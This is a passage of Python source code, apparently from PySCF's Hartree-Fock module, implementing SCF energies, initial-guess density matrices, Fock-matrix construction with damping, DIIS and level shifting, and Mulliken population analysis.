        fock = mf.get_fock(h1e, s1e, vhf, dm)
        norm_gorb = numpy.linalg.norm(mf.get_grad(mo_coeff, mo_occ, fock))
        if not TIGHT_GRAD_CONV_TOL:
            norm_gorb = norm_gorb / numpy.sqrt(norm_gorb.size)
        norm_ddm = numpy.linalg.norm(dm-dm_last)

        # Loosened thresholds for the post-convergence re-check.
        conv_tol = conv_tol * 10
        conv_tol_grad = conv_tol_grad * 3
        if callable(mf.check_convergence):
            scf_conv = mf.check_convergence(locals())
        elif abs(e_tot-last_hf_e) < conv_tol or norm_gorb < conv_tol_grad:
            scf_conv = True
        logger.info(mf, 'Extra cycle E= %.15g delta_E= %4.3g |g|= %4.3g |ddm|= %4.3g',
                    e_tot, e_tot-last_hf_e, norm_gorb, norm_ddm)
        if dump_chk:
            mf.dump_chk(locals())

    logger.timer(mf, 'scf_cycle', *cput0)
    # A post-processing hook before return
    mf.post_kernel(locals())
    return scf_conv, e_tot, mo_energy, mo_coeff, mo_occ
def energy_elec(mf, dm=None, h1e=None, vhf=None):
    r'''Electronic part of the Hartree-Fock energy for a given core
    Hamiltonian and HF potential:

    .. math::

        E = \sum_{ij} h_{ij} \gamma_{ji}
          + \frac{1}{2}\sum_{ijkl} \gamma_{ji}\gamma_{lk} \langle ik||jl\rangle

    Side effect: updates ``mf.scf_summary['e1']`` and ``mf.scf_summary['e2']``.

    Kwargs:
        dm : 2D ndarray
            one-particle density matrix (default: ``mf.make_rdm1()``)
        h1e : 2D ndarray
            core Hamiltonian (default: ``mf.get_hcore()``)
        vhf : 2D ndarray
            HF potential (default: ``mf.get_veff(mf.mol, dm)``)

    Returns:
        ``(e_elec, e_coul)`` — the real electronic energy and the Coulomb part.
    '''
    if dm is None:
        dm = mf.make_rdm1()
    if h1e is None:
        h1e = mf.get_hcore()
    if vhf is None:
        vhf = mf.get_veff(mf.mol, dm)
    # Tr(h D) and 1/2 Tr(V D); .real discards numerical noise for complex dm.
    e1 = numpy.einsum('ij,ji->', h1e, dm)
    e_coul = numpy.einsum('ij,ji->', vhf, dm) * .5
    mf.scf_summary['e1'] = e1.real
    mf.scf_summary['e2'] = e_coul.real
    logger.debug(mf, 'E1 = %s E_coul = %s', e1, e_coul)
    return (e1 + e_coul).real, e_coul
def energy_tot(mf, dm=None, h1e=None, vhf=None):
    r'''Total Hartree-Fock energy: electronic part plus nuclear repulsion.

    See :func:`scf.hf.energy_elec` for the electronic part.

    Side effect: updates ``mf.scf_summary['nuc']`` (and, via
    ``mf.energy_elec``, the electronic summary entries).
    '''
    nuc = mf.energy_nuc()
    e_elec = mf.energy_elec(dm, h1e, vhf)[0]
    mf.scf_summary['nuc'] = nuc.real
    return e_elec + nuc
def get_hcore(mol):
    '''Core Hamiltonian: kinetic energy plus nuclear attraction (or a GTH
    pseudopotential when ``mol._pseudo`` is set), plus scalar ECP terms
    when ECP basis functions are present.
    '''
    hcore = mol.intor_symmetric('int1e_kin')

    if mol._pseudo:
        # Although mol._pseudo for GTH PP is only available in Cell, GTH PP
        # may exist if mol is converted from cell object.
        from pyscf.gto import pp_int
        hcore += pp_int.get_gth_pp(mol)
    else:
        hcore += mol.intor_symmetric('int1e_nuc')

    if len(mol._ecpbas) > 0:
        hcore += mol.intor_symmetric('ECPscalar')
    return hcore
def get_ovlp(mol):
    '''Return the AO overlap matrix of *mol* (the ``int1e_ovlp`` integrals).'''
    return mol.intor_symmetric('int1e_ovlp')
def init_guess_by_minao(mol):
    '''Generate initial guess density matrix based on ANO basis, then project
    the density matrix to the basis set defined by ``mol``

    Returns:
        Density matrix, 2D ndarray

    Examples:

    >>> from pyscf import gto, scf
    >>> mol = gto.M(atom='H 0 0 0; H 0 0 1.1')
    >>> scf.hf.init_guess_by_minao(mol)
    array([[ 0.94758917,  0.09227308],
           [ 0.09227308,  0.94758917]])
    '''
    from pyscf.scf import atom_hf
    from pyscf.scf import addons

    def minao_basis(symb, nelec_ecp):
        # Return (occupations, basis) for one element: the occupancy-averaged
        # ANO valence configuration, or (for ECP atoms with AO-like input
        # basis) the input basis itself.
        occ = []
        basis_ano = []
        if gto.is_ghost_atom(symb):
            # Ghost atoms carry basis functions but no electrons.
            return occ, basis_ano

        stdsymb = gto.mole._std_symbol(symb)
        basis_add = gto.basis.load('ano', stdsymb)
        # coreshl defines the core shells to be removed in the initial guess
        coreshl = gto.ecp.core_configuration(nelec_ecp)
        #coreshl = (0,0,0,0)  # it keeps all core electrons in the initial guess

        # Only s, p, d, f shells (l = 0..3) are considered for the guess.
        for l in range(4):
            ndocc, frac = atom_hf.frac_occ(stdsymb, l)
            assert ndocc >= coreshl[l]
            degen = l * 2 + 1
            # Doubly occupy the non-core closed shells; the open shell gets
            # the fractional (occupancy-averaged) population.
            occ_l = [2,]*(ndocc-coreshl[l]) + [frac,]
            occ.append(numpy.repeat(occ_l, degen))
            # Strip the contraction columns that correspond to removed cores.
            basis_ano.append([l] + [b[:1] + b[1+coreshl[l]:ndocc+2]
                                    for b in basis_add[l][1:]])
        occ = numpy.hstack(occ)

        if nelec_ecp > 0:
            # ECP atom: try to use the user's input basis directly instead of
            # projecting from ANO.
            if symb in mol._basis:
                input_basis = mol._basis[symb]
            elif stdsymb in mol._basis:
                input_basis = mol._basis[stdsymb]
            else:
                raise KeyError(symb)

            basis4ecp = [[] for i in range(4)]
            for bas in input_basis:
                l = bas[0]
                if l < 4:
                    basis4ecp[l].append(bas)

            # Occupations matching the input-basis contraction pattern.
            occ4ecp = []
            for l in range(4):
                nbas_l = sum((len(bas[1]) - 1) for bas in basis4ecp[l])
                ndocc, frac = atom_hf.frac_occ(stdsymb, l)
                ndocc -= coreshl[l]
                assert ndocc <= nbas_l

                occ_l = numpy.zeros(nbas_l)
                occ_l[:ndocc] = 2
                if frac > 0:
                    occ_l[ndocc] = frac
                occ4ecp.append(numpy.repeat(occ_l, l * 2 + 1))

            occ4ecp = numpy.hstack(occ4ecp)
            basis4ecp = lib.flatten(basis4ecp)

            # Compared to ANO valence basis, to check whether the ECP basis set has
            # reasonable AO-character contraction.  The ANO valence AO should have
            # significant overlap to ECP basis if the ECP basis has AO-character.
            atm1 = gto.Mole()
            atm2 = gto.Mole()
            atom = [[symb, (0.,0.,0.)]]
            atm1._atm, atm1._bas, atm1._env = atm1.make_env(atom, {symb:basis4ecp}, [])
            atm2._atm, atm2._bas, atm2._env = atm2.make_env(atom, {symb:basis_ano}, [])
            atm1._built = True
            atm2._built = True
            s12 = gto.intor_cross('int1e_ovlp', atm1, atm2)
            if abs(numpy.linalg.det(s12[occ4ecp>0][:,occ>0])) > .1:
                # Input basis has AO character: use it as the guess basis.
                occ, basis_ano = occ4ecp, basis4ecp
            else:
                logger.debug(mol, 'Density of valence part of ANO basis '
                             'will be used as initial guess for %s', symb)
        return occ, basis_ano

    # Issue 548
    if any(gto.charge(mol.atom_symbol(ia)) > 96 for ia in range(mol.natm)):
        logger.info(mol, 'MINAO initial guess is not available for super-heavy '
                    'elements. "atom" initial guess is used.')
        return init_guess_by_atom(mol)

    nelec_ecp_dic = dict([(mol.atom_symbol(ia), mol.atom_nelec_core(ia))
                          for ia in range(mol.natm)])

    basis = {}
    occdic = {}
    for symb, nelec_ecp in nelec_ecp_dic.items():
        occ_add, basis_add = minao_basis(symb, nelec_ecp)
        occdic[symb] = occ_add
        basis[symb] = basis_add

    # Assemble the per-atom occupations; ghost atoms contribute no density.
    occ = []
    new_atom = []
    for ia in range(mol.natm):
        symb = mol.atom_symbol(ia)
        if not gto.is_ghost_atom(symb):
            occ.append(occdic[symb])
            new_atom.append(mol._atom[ia])
    occ = numpy.hstack(occ)

    # Build a fake molecule in the guess basis and project its diagonal
    # density matrix onto the target basis of ``mol``.
    pmol = gto.Mole()
    pmol._atm, pmol._bas, pmol._env = pmol.make_env(new_atom, basis, [])
    pmol._built = True
    dm = addons.project_dm_nr2nr(pmol, numpy.diag(occ), mol)

    # normalize electron number
    #    s = mol.intor_symmetric('int1e_ovlp')
    #    dm *= mol.nelectron / (dm*s).sum()
    return dm
def init_guess_by_1e(mol):
    '''Generate initial guess density matrix from core hamiltonian

    Returns:
        Density matrix, 2D ndarray
    '''
    return RHF(mol).init_guess_by_1e(mol)
def init_guess_by_atom(mol):
    '''Generate initial guess density matrix from superposition of atomic HF
    density matrix.  The atomic HF is occupancy averaged RHF

    Returns:
        Density matrix, 2D ndarray
    '''
    from pyscf.scf import atom_hf
    atm_scf = atom_hf.get_atm_nrhf(mol)
    aoslice = mol.aoslice_by_atom()
    atm_dms = []
    for ia in range(mol.natm):
        symb = mol.atom_symbol(ia)
        if symb not in atm_scf:
            # Retry with the plain element symbol — presumably strips custom
            # atom labels; confirm against atom_pure_symbol semantics.
            symb = mol.atom_pure_symbol(ia)

        if symb in atm_scf:
            e_hf, e, c, occ = atm_scf[symb]
            # Atomic density matrix: D = C * n * C^dagger
            dm = numpy.dot(c*occ, c.conj().T)
        else:  # symb's basis is not specified in the input
            nao_atm = aoslice[ia,3] - aoslice[ia,2]
            dm = numpy.zeros((nao_atm, nao_atm))

        atm_dms.append(dm)

    # Superposition of atomic densities = block-diagonal guess matrix.
    dm = scipy.linalg.block_diag(*atm_dms)

    if mol.cart:
        # Atomic solutions are spherical; transform into the cartesian basis.
        cart2sph = mol.cart2sph_coeff(normalized='sp')
        dm = reduce(numpy.dot, (cart2sph, dm, cart2sph.T))

    for k, v in atm_scf.items():
        logger.debug1(mol, 'Atom %s, E = %.12g', k, v[0])
    return dm
def init_guess_by_huckel(mol):
    '''Generate an initial guess density matrix from a Huckel calculation
    built on occupancy-averaged atomic RHF calculations,
    doi:10.1021/acs.jctc.8b01089

    Returns:
        Density matrix, 2D ndarray
    '''
    mo_e, mo_c = _init_guess_huckel_orbitals(mol)
    occ = get_occ(SCF(mol), mo_e, mo_c)
    return make_rdm1(mo_c, occ)
def _init_guess_huckel_orbitals(mol):
    '''Generate initial guess orbitals from a Huckel calculation based
    on occupancy averaged atomic RHF calculations, doi:10.1021/acs.jctc.8b01089

    Returns:
        An 1D array for Huckel orbital energies and an 2D array for orbital coefficients
    '''
    from pyscf.scf import atom_hf
    atm_scf = atom_hf.get_atm_nrhf(mol)

    # GWH parameter value
    Kgwh = 1.75

    # Run atomic SCF calculations to get orbital energies, coefficients and occupations
    at_e = []
    at_c = []
    at_occ = []
    for ia in range(mol.natm):
        symb = mol.atom_symbol(ia)
        if symb not in atm_scf:
            symb = mol.atom_pure_symbol(ia)
        e_hf, e, c, occ = atm_scf[symb]
        at_c.append(c)
        at_e.append(e)
        at_occ.append(occ)

    # Count number of occupied orbitals
    nocc = 0
    for ia in range(mol.natm):
        for iorb in range(len(at_occ[ia])):
            if(at_occ[ia][iorb]>0.0):
                nocc=nocc+1

    # Number of basis functions
    nbf = mol.nao_nr()

    # Collect AO coefficients and energies
    orb_E = numpy.zeros(nocc)
    orb_C = numpy.zeros((nbf,nocc))

    # Atomic basis info
    aoslice = mol.aoslice_by_atom()

    # Scatter each occupied atomic orbital into its atom's AO block; the
    # minimal Huckel basis is spanned by these occupied atomic orbitals.
    iocc = 0
    for ia in range(mol.natm):
        # First and last bf index
        abeg = aoslice[ia, 2]
        aend = aoslice[ia, 3]
        for iorb in range(len(at_occ[ia])):
            if(at_occ[ia][iorb]>0.0):
                orb_C[abeg:aend,iocc] = at_c[ia][:,iorb]
                orb_E[iocc] = at_e[ia][iorb]
                iocc=iocc+1

    # Overlap matrix
    S = get_ovlp(mol)
    # Atomic orbital overlap
    orb_S = orb_C.transpose().dot(S).dot(orb_C)

    # Build Huckel matrix
    orb_H = numpy.zeros((nocc,nocc))
    for io in range(nocc):
        # Diagonal is just the orbital energies
        orb_H[io,io] = orb_E[io]
        for jo in range(io):
            # Off-diagonal is given by GWH approximation
            orb_H[io,jo] = 0.5*Kgwh*orb_S[io,jo]*(orb_E[io]+orb_E[jo])
            orb_H[jo,io] = orb_H[io,jo]

    # Energies and coefficients in the minimal orbital basis
    # NOTE(review): this calls eig() with only two arguments — the
    # module-level eig() must provide a default for its eigensolver
    # parameter for this call to succeed; verify.
    mo_E, atmo_C = eig(orb_H, orb_S)
    # and in the AO basis
    mo_C = orb_C.dot(atmo_C)
    return mo_E, mo_C
def init_guess_by_chkfile(mol, chkfile_name, project=None):
    '''Read the HF results from checkpoint file, then project it to the
    basis defined by ``mol``

    Returns:
        Density matrix, 2D ndarray
    '''
    from pyscf.scf import uhf
    # The UHF reader returns (alpha, beta); the RHF guess is their sum.
    dma, dmb = uhf.init_guess_by_chkfile(mol, chkfile_name, project)
    return dma + dmb
def get_init_guess(mol, key='minao'):
    '''Generate density matrix for initial guess

    Kwargs:
        key : str
            One of 'minao', 'atom', 'huckel', 'hcore', '1e', 'chkfile'.
    '''
    mf = RHF(mol)
    return mf.get_init_guess(mol, key)
# eigenvalue of d is 1
def level_shift(s, d, f, factor):
    r'''Apply level shift :math:`\Delta` to virtual orbitals

    .. math::
       :nowrap:

       \begin{align}
         FC &= SCE \\
         F &= F + SC \Lambda C^\dagger S \\
         \Lambda_{ij} &=
         \begin{cases}
            \delta_{ij}\Delta & i \in \text{virtual} \\
            0 & \text{otherwise}
         \end{cases}
       \end{align}

    Returns:
        New Fock matrix, 2D ndarray
    '''
    # S - S D S projects onto the virtual space (d's occupied eigenvalues
    # are expected to be 1 here).
    virtual_projector = s - s.dot(d).dot(s)
    return f + factor * virtual_projector
def damping(s, d, f, factor):
    '''Damp the Fock matrix by removing a scaled, symmetrized occupied-space
    projection of it; this attenuates density oscillations between SCF
    cycles.'''
    proj_vir = numpy.eye(s.shape[0]) - s.dot(d)
    f0 = proj_vir.dot(f).dot(d).dot(s)
    f0 = (f0 + f0.conj().T) * (factor / (factor + 1.))
    return f - f0
# full density matrix for RHF
def make_rdm1(mo_coeff, mo_occ, **kwargs):
    '''One-particle density matrix in AO representation

    Args:
        mo_coeff : 2D ndarray
            Orbital coefficients. Each column is one orbital.
        mo_occ : 1D ndarray
            Occupancy
    '''
    occupied = mo_occ > 0
    cocc = mo_coeff[:, occupied]
    # Deliberately NOT a tag_array: downstream consumers (get_jk, get_vxc)
    # would read the (mo_coeff, mo_occ) tags to build the potential and could
    # silently ignore later in-place modifications of the plain DM array.
    return numpy.dot(cocc * mo_occ[occupied], cocc.conj().T)
################################################
# for general DM
# hermi = 0 : arbitary
# hermi = 1 : hermitian
# hermi = 2 : anti-hermitian
################################################
def dot_eri_dm(eri, dm, hermi=0, with_j=True, with_k=True):
    '''Compute J, K matrices in terms of the given 2-electron integrals and
    density matrix:

    J ~ numpy.einsum('pqrs,qp->rs', eri, dm)
    K ~ numpy.einsum('pqrs,qr->ps', eri, dm)

    Args:
        eri : ndarray
            8-fold or 4-fold ERIs or complex integral array with N^4 elements
            (N is the number of orbitals)
        dm : ndarray or list of ndarrays
            A density matrix or a list of density matrices

    Kwargs:
        hermi : int
            Whether J, K matrix is hermitian

            | 0 : no hermitian or symmetric
            | 1 : hermitian
            | 2 : anti-hermitian

    Returns:
        Depending on the given dm, the function returns one J and one K matrix,
        or a list of J matrices and a list of K matrices, corresponding to the
        input density matrices.

    Examples:

    >>> from pyscf import gto, scf
    >>> from pyscf.scf import _vhf
    >>> mol = gto.M(atom='H 0 0 0; H 0 0 1.1')
    >>> eri = _vhf.int2e_sph(mol._atm, mol._bas, mol._env)
    >>> dms = numpy.random.random((3,mol.nao_nr(),mol.nao_nr()))
    >>> j, k = scf.hf.dot_eri_dm(eri, dms, hermi=0)
    >>> print(j.shape)
    (3, 2, 2)
    '''
    dm = numpy.asarray(dm)
    nao = dm.shape[-1]
    if eri.dtype == numpy.complex128 or eri.size == nao**4:
        # Full (unpacked) or complex integrals: contract directly via einsum.
        eri = eri.reshape((nao,)*4)
        dms = dm.reshape(-1, nao, nao)
        vj = vk = None
        if with_j:
            vj = numpy.einsum('ijkl,xji->xkl', eri, dms).reshape(dm.shape)
        if with_k:
            vk = numpy.einsum('ijkl,xjk->xil', eri, dms).reshape(dm.shape)
    else:
        # Real, symmetry-packed integrals go through the C routine; a complex
        # density matrix is handled with two real contractions.
        vj, vk = _vhf.incore(eri, dm.real, hermi, with_j, with_k)
        if dm.dtype == numpy.complex128:
            v_imag = _vhf.incore(eri, dm.imag, 0, with_j, with_k)
            if with_j:
                vj = vj + v_imag[0] * 1j
            if with_k:
                vk = vk + v_imag[1] * 1j
    return vj, vk
def get_jk(mol, dm, hermi=1, vhfopt=None, with_j=True, with_k=True, omega=None):
    '''Compute J, K matrices for all input density matrices

    Args:
        mol : an instance of :class:`Mole`

        dm : ndarray or list of ndarrays
            A density matrix or a list of density matrices

    Kwargs:
        hermi : int
            Whether J, K matrix is hermitian

            | 0 : not hermitian and not symmetric
            | 1 : hermitian or symmetric
            | 2 : anti-hermitian

        vhfopt :
            A class which holds precomputed quantities to optimize the
            computation of J, K matrices

        with_j : boolean
            Whether to compute J matrices

        with_k : boolean
            Whether to compute K matrices

        omega : float
            Parameter of range-separated Coulomb operator: erf( omega * r12 ) / r12.
            If specified, integration are evaluated based on the long-range
            part of the range-separated Coulomb operator.

    Returns:
        Depending on the given dm, the function returns one J and one K matrix,
        or a list of J matrices and a list of K matrices, corresponding to the
        input density matrices.

    Examples:

    >>> from pyscf import gto, scf
    >>> from pyscf.scf import _vhf
    >>> mol = gto.M(atom='H 0 0 0; H 0 0 1.1')
    >>> dms = numpy.random.random((3,mol.nao_nr(),mol.nao_nr()))
    >>> j, k = scf.hf.get_jk(mol, dms, hermi=0)
    >>> print(j.shape)
    (3, 2, 2)
    '''
    dm = numpy.asarray(dm, order='C')
    dm_shape = dm.shape
    dm_dtype = dm.dtype
    nao = dm_shape[-1]

    if dm_dtype == numpy.complex128:
        # The C driver handles only real matrices: stack real and imaginary
        # parts as extra density matrices and recombine after the contraction.
        dm = numpy.vstack((dm.real, dm.imag)).reshape(-1,nao,nao)
        hermi = 0

    if omega is None:
        vj, vk = _vhf.direct(dm, mol._atm, mol._bas, mol._env,
                             vhfopt, hermi, mol.cart, with_j, with_k)
    else:
        # The vhfopt of standard Coulomb operator can be used here as an approximate
        # integral prescreening conditioner since long-range part Coulomb is always
        # smaller than standard Coulomb.  It's safe to filter LR integrals with the
        # integral estimation from standard Coulomb.
        with mol.with_range_coulomb(omega):
            vj, vk = _vhf.direct(dm, mol._atm, mol._bas, mol._env,
                                 vhfopt, hermi, mol.cart, with_j, with_k)

    if dm_dtype == numpy.complex128:
        # Reassemble the complex J/K matrices from the stacked real results.
        if with_j:
            vj = vj.reshape(2,-1)
            vj = vj[0] + vj[1] * 1j
            vj = vj.reshape(dm_shape)
        if with_k:
            vk = vk.reshape(2,-1)
            vk = vk[0] + vk[1] * 1j
            vk = vk.reshape(dm_shape)
    return vj, vk
def get_veff(mol, dm, dm_last=None, vhf_last=None, hermi=1, vhfopt=None):
    '''Hartree-Fock potential matrix for the given density matrix

    Args:
        mol : an instance of :class:`Mole`

        dm : ndarray or list of ndarrays
            A density matrix or a list of density matrices

    Kwargs:
        dm_last : ndarray or a list of ndarrays or 0
            The density matrix baseline.  If not 0, this function computes the
            increment of HF potential w.r.t. the reference HF potential matrix.
        vhf_last : ndarray or a list of ndarrays or 0
            The reference HF potential matrix.
        hermi : int
            Whether J, K matrix is hermitian

            | 0 : no hermitian or symmetric
            | 1 : hermitian
            | 2 : anti-hermitian

        vhfopt :
            A class which holds precomputed quantities to optimize the
            computation of J, K matrices

    Returns:
        matrix Vhf = 2*J - K.  Vhf can be a list matrices, corresponding to the
        input density matrices.

    Examples:

    >>> import numpy
    >>> from pyscf import gto, scf
    >>> from pyscf.scf import _vhf
    >>> mol = gto.M(atom='H 0 0 0; H 0 0 1.1')
    >>> dm0 = numpy.random.random((mol.nao_nr(),mol.nao_nr()))
    >>> vhf0 = scf.hf.get_veff(mol, dm0, hermi=0)
    >>> dm1 = numpy.random.random((mol.nao_nr(),mol.nao_nr()))
    >>> vhf1 = scf.hf.get_veff(mol, dm1, hermi=0)
    >>> vhf2 = scf.hf.get_veff(mol, dm1, dm_last=dm0, vhf_last=vhf0, hermi=0)
    >>> numpy.allclose(vhf1, vhf2)
    True
    '''
    if dm_last is None:
        # Full build from scratch.
        vj, vk = get_jk(mol, numpy.asarray(dm), hermi, vhfopt)
        return vj - vk * .5
    # Incremental build: contract only the density difference, then add the
    # reference potential back on.
    delta_dm = numpy.asarray(dm) - numpy.asarray(dm_last)
    vj, vk = get_jk(mol, delta_dm, hermi, vhfopt)
    return vj - vk * .5 + numpy.asarray(vhf_last)
def get_fock(mf, h1e=None, s1e=None, vhf=None, dm=None, cycle=-1, diis=None,
             diis_start_cycle=None, level_shift_factor=None, damp_factor=None):
    '''F = h^{core} + V^{HF}

    Special treatment (damping, DIIS, or level shift) will be applied to the
    Fock matrix if diis and cycle is specified (The two parameters are passed
    to get_fock function during the SCF iteration)

    Kwargs:
        h1e : 2D ndarray
            Core hamiltonian
        s1e : 2D ndarray
            Overlap matrix, for DIIS
        vhf : 2D ndarray
            HF potential matrix
        dm : 2D ndarray
            Density matrix, for DIIS
        cycle : int
            Then present SCF iteration step, for DIIS
        diis : an object of :attr:`SCF.DIIS` class
            DIIS object to hold intermediate Fock and error vectors
        diis_start_cycle : int
            The step to start DIIS. Default is 0.
        level_shift_factor : float or int
            Level shift (in AU) for virtual space. Default is 0.
        damp_factor : float or int
            Damping factor applied to the Fock matrix in early cycles.
            Default is 0.
    '''
    if h1e is None: h1e = mf.get_hcore()
    if vhf is None: vhf = mf.get_veff(mf.mol, dm)
    f = h1e + vhf
    if cycle < 0 and diis is None:  # Not inside the SCF iteration
        return f

    if diis_start_cycle is None:
        diis_start_cycle = mf.diis_start_cycle
    if level_shift_factor is None:
        level_shift_factor = mf.level_shift
    if damp_factor is None:
        damp_factor = mf.damp
    if s1e is None: s1e = mf.get_ovlp()
    if dm is None: dm = mf.make_rdm1()

    # Damping is applied only before DIIS takes over.  Note dm*.5 rescales
    # the RHF density matrix so occupied eigenvalues are 1, the convention
    # damping()/level_shift() expect.
    if 0 <= cycle < diis_start_cycle-1 and abs(damp_factor) > 1e-4:
        f = damping(s1e, dm*.5, f, damp_factor)
    if diis is not None and cycle >= diis_start_cycle:
        f = diis.update(s1e, dm, f, mf, h1e, vhf)
    # Level shift is applied after the DIIS extrapolation, every cycle.
    if abs(level_shift_factor) > 1e-4:
        f = level_shift(s1e, dm*.5, f, level_shift_factor)
    return f
def get_occ(mf, mo_energy=None, mo_coeff=None):
    '''Label the occupancies for each orbital

    Kwargs:
        mo_energy : 1D ndarray
            Obital energies

        mo_coeff : 2D ndarray
            Obital coefficients

    Examples:

    >>> from pyscf import gto, scf
    >>> mol = gto.M(atom='H 0 0 0; F 0 0 1.1')
    >>> mf = scf.hf.SCF(mol)
    >>> energy = numpy.array([-10., -1., 1, -2., 0, -3])
    >>> mf.get_occ(energy)
    array([2, 2, 0, 2, 2, 2])
    '''
    if mo_energy is None: mo_energy = mf.mo_energy
    nmo = mo_energy.size
    nocc = mf.mol.nelectron // 2

    # Aufbau filling: doubly occupy the nocc lowest-energy orbitals.
    order = numpy.argsort(mo_energy)
    sorted_e = mo_energy[order]
    mo_occ = numpy.zeros(nmo)
    mo_occ[order[:nocc]] = 2

    if mf.verbose >= logger.INFO and nocc < nmo:
        homo, lumo = sorted_e[nocc-1], sorted_e[nocc]
        if homo+1e-3 > lumo:
            logger.warn(mf, 'HOMO %.15g == LUMO %.15g', homo, lumo)
        else:
            logger.info(mf, '  HOMO = %.15g  LUMO = %.15g', homo, lumo)

    if mf.verbose >= logger.DEBUG:
        numpy.set_printoptions(threshold=nmo)
        logger.debug(mf, '  mo_energy =\n%s', mo_energy)
        numpy.set_printoptions(threshold=1000)
    return mo_occ
def get_grad(mo_coeff, mo_occ, fock_ao):
    '''RHF orbital gradients

    Args:
        mo_coeff : 2D ndarray
            Obital coefficients
        mo_occ : 1D ndarray
            Orbital occupancy
        fock_ao : 2D ndarray
            Fock matrix in AO representation

    Returns:
        Gradients in MO representation.  It's a num_occ*num_vir vector.
    '''
    occ_mask = mo_occ > 0
    c_occ = mo_coeff[:, occ_mask]
    c_vir = mo_coeff[:, ~occ_mask]
    # Virtual-occupied block of the Fock matrix in MO basis, times 2.
    grad = c_vir.conj().T.dot(fock_ao).dot(c_occ) * 2
    return grad.ravel()
def analyze(mf, verbose=logger.DEBUG, with_meta_lowdin=WITH_META_LOWDIN,
            **kwargs):
    '''Analyze the given SCF object:  print orbital energies, occupancies;
    print orbital coefficients; Mulliken population analysis; Dipole moment.
    '''
    from pyscf.lo import orth
    from pyscf.tools import dump_mat
    mo_energy = mf.mo_energy
    mo_occ = mf.mo_occ
    mo_coeff = mf.mo_coeff
    log = logger.new_logger(mf, verbose)

    if log.verbose >= logger.NOTE:
        mf.dump_scf_summary(log)
        log.note('**** MO energy ****')
        for i,c in enumerate(mo_occ):
            log.note('MO #%-3d energy= %-18.15g occ= %g', i+MO_BASE,
                     mo_energy[i], c)

    ovlp_ao = mf.get_ovlp()
    if verbose >= logger.DEBUG:
        label = mf.mol.ao_labels()
        if with_meta_lowdin:
            log.debug(' ** MO coefficients (expansion on meta-Lowdin AOs) **')
            orth_coeff = orth.orth_ao(mf.mol, 'meta_lowdin', s=ovlp_ao)
            # Project the MOs onto the orthogonal AOs: C' = X^dagger S C
            c = reduce(numpy.dot, (orth_coeff.conj().T, ovlp_ao, mo_coeff))
        else:
            log.debug(' ** MO coefficients (expansion on AOs) **')
            c = mo_coeff
        dump_mat.dump_rec(mf.stdout, c, label, start=MO_BASE, **kwargs)

    dm = mf.make_rdm1(mo_coeff, mo_occ)
    if with_meta_lowdin:
        return (mf.mulliken_meta(mf.mol, dm, s=ovlp_ao, verbose=log),
                mf.dip_moment(mf.mol, dm, verbose=log))
    else:
        return (mf.mulliken_pop(mf.mol, dm, s=ovlp_ao, verbose=log),
                mf.dip_moment(mf.mol, dm, verbose=log))
def dump_scf_summary(mf, verbose=logger.DEBUG):
    '''Print the itemized energy decomposition recorded in mf.scf_summary.

    Components that were never recorded by the SCF driver are skipped.
    '''
    if not mf.scf_summary:
        return

    log = logger.new_logger(mf, verbose)
    summary = mf.scf_summary
    def write(fmt, key):
        # Print a component only if the driver recorded it.
        if key in summary:
            log.info(fmt, summary[key])
    log.info('**** SCF Summaries ****')
    log.info('Total Energy =                    %24.15f', mf.e_tot)
    write('Nuclear Repulsion Energy =        %24.15f', 'nuc')
    write('One-electron Energy =             %24.15f', 'e1')
    write('Two-electron Energy =             %24.15f', 'e2')
    write('Two-electron Coulomb Energy =     %24.15f', 'coul')
    write('DFT Exchange-Correlation Energy = %24.15f', 'exc')
    write('Empirical Dispersion Energy =     %24.15f', 'dispersion')
    write('PCM Polarization Energy =         %24.15f', 'epcm')
    write('EFP Energy =                      %24.15f', 'efp')
    # Finite-temperature (smearing) quantities, if the object carries them.
    if getattr(mf, 'entropy', None):
        log.info('(Electronic) Entropy              %24.15f', mf.entropy)
        log.info('(Electronic) Zero Point Energy    %24.15f', mf.e_zero)
        log.info('Free Energy =                     %24.15f', mf.e_free)
def mulliken_pop(mol, dm, s=None, verbose=logger.DEBUG):
    r'''Mulliken population analysis

    .. math:: M_{ij} = D_{ij} S_{ji}

    Mulliken charges

    .. math:: \delta_i = \sum_j M_{ij}

    Returns:
        A list : pop, charges

        pop : nparray
            Mulliken population on each atomic orbitals

        charges : nparray
            Mulliken charges
    '''
    if s is None: s = get_ovlp(mol)
    log = logger.new_logger(mol, verbose)
    if isinstance(dm, numpy.ndarray) and dm.ndim == 2:
        # Gross orbital populations: diag(D S)
        pop = numpy.einsum('ij,ji->i', dm, s).real
    else: # ROHF
        pop = numpy.einsum('ij,ji->i', dm[0]+dm[1], s).real

    log.info(' ** Mulliken pop  **')
    # NOTE(review): the loop below rebinds the parameter `s` to AO label
    # strings; the overlap matrix is no longer needed past this point, but
    # the reuse is easy to misread.
    for i, s in enumerate(mol.ao_labels()):
        log.info('pop of  %s %10.5f', s, pop[i])

    log.note(' ** Mulliken atomic charges **')
    chg = numpy.zeros(mol.natm)
    for i, s in enumerate(mol.ao_labels(fmt=None)):
        # s[0] is the index of the atom the AO belongs to.
        chg[s[0]] += pop[i]
    chg = mol.atom_charges() - chg
    for ia in range(mol.natm):
        symb = mol.atom_symbol(ia)
        log.note('charge of  %d%s =   %10.5f', ia, symb, chg[ia])
    return pop, chg
def mulliken_meta(mol, dm, verbose=logger.DEBUG,
                  pre_orth_method=PRE_ORTH_METHOD, s=None):
    '''Mulliken population analysis, based on meta-Lowdin AOs.
    In the meta-lowdin, the AOs are grouped in three sets: core, valence and
    Rydberg, the orthogonalization are carried out within each subsets.

    Args:
        mol : an instance of :class:`Mole`

        dm : ndarray or 2-item list of ndarray
            Density matrix.  ROHF dm is a 2-item list of 2D array

    Kwargs:
        verbose : int or instance of :class:`lib.logger.Logger`

        pre_orth_method : str
            Pre-orthogonalization, which localized GTOs for each atom.
            To obtain the occupied and unoccupied atomic shells, there are
            three methods

            | 'ano'   : Project GTOs to ANO basis
            | 'minao' : Project GTOs to MINAO basis
            | 'scf'   : Symmetry-averaged fractional occupation atomic RHF

    Returns:
        A list : pop, charges

        pop : nparray
            Mulliken population on each atomic orbitals

        charges : nparray
            Mulliken charges
    '''
    from pyscf.lo import orth
    if s is None: s = get_ovlp(mol)
    log = logger.new_logger(mol, verbose)

    orth_coeff = orth.orth_ao(mol, 'meta_lowdin', pre_orth_method, s=s)
    # Transform D into the orthogonal meta-Lowdin basis:
    # D' = (C^dagger S) D (C^dagger S)^dagger
    c_inv = numpy.dot(orth_coeff.conj().T, s)
    if isinstance(dm, numpy.ndarray) and dm.ndim == 2:
        dm = reduce(numpy.dot, (c_inv, dm, c_inv.T.conj()))
    else: # ROHF
